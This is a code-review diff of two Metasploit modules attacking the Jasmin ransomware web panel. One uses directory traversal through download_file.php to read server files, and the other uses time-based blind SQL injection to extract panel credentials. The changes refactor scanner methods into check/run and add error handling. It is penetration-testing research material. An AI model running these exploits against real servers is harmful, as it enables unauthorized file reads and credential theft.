reviews for jasmin ransomware panel

Author: h00die

modules/auxiliary/gather/jasmin_ransomware_dir_traversal.rb

@@ -6,7 +6,6 @@
 class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(
@@ -47,27 +46,33 @@ def initialize(info = {})
     )
   end
 
-  def run_host(ip)
+  def check
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path)
     )
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? '<title>Jasmin Dashboard</title>'
+    Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+  end
 
+  def run
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path, 'download_file.php'),
       'vars_get' => {
         'file' => "#{'../' * datastore['DEPTH']}#{datastore['FILE']}"
       }
     )
+    fail_with(Failure::Unknown, 'No response from server') if res.nil?
     fail_with(Failure::NotFound, 'Check FILE or DEPTH, file not found on server') if res.body.empty?
+    fail_with(Failure::UnexpectedReply, "Server returned an unexpected HTTP code: #{res.code}") unless res.code == 200
 
     print_good(res.body)
     # store loot
     path = store_loot(
       'jasmin.webpanel.dir.traversal',
       'text/plain',
-      ip,
+      datastore['rhost'],
       res.body,
       File.basename(datastore['FILE'])
     )

modules/auxiliary/gather/jasmin_ransomware_sqli.rb

@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Report
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::SQLi
-  include Msf::Auxiliary::Scanner
 
   def initialize(info = {})
     super(
@@ -49,13 +48,17 @@ def initialize(info = {})
     )
   end
 
-  def run_host(ip)
+  def check
     res = send_request_cgi(
       'uri' => normalize_uri(target_uri.path)
     )
+    return Exploit::CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return Exploit::CheckCode::Safe("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    fail_with(Failure::NotFound, 'Check TARGETURI, Jasmin Dashboard not detected') unless res.body.include? '<title>Jasmin Dashboard</title>'
+    Exploit::CheckCode::Detected('Jasmin Login page detected') if res.body.include? '<title>Jasmin Dashboard</title>'
+  end
 
+  def run
     @sqli = create_sqli(dbms: MySQLi::TimeBasedBlind) do |payload|
       check_char = Rex::Text.rand_text_alpha_lower(5)
       res = send_request_cgi({
@@ -88,7 +91,7 @@ def run_host(ip)
         private_type: :password,
         private_data: user[1],
         service_name: 'Jasmin Webpanel',
-        address: ip,
+        address: datastore['RHOST'],
         port: datastore['RPORT'],
         protocol: 'tcp',
         status: Metasploit::Model::Login::Status::UNTRIED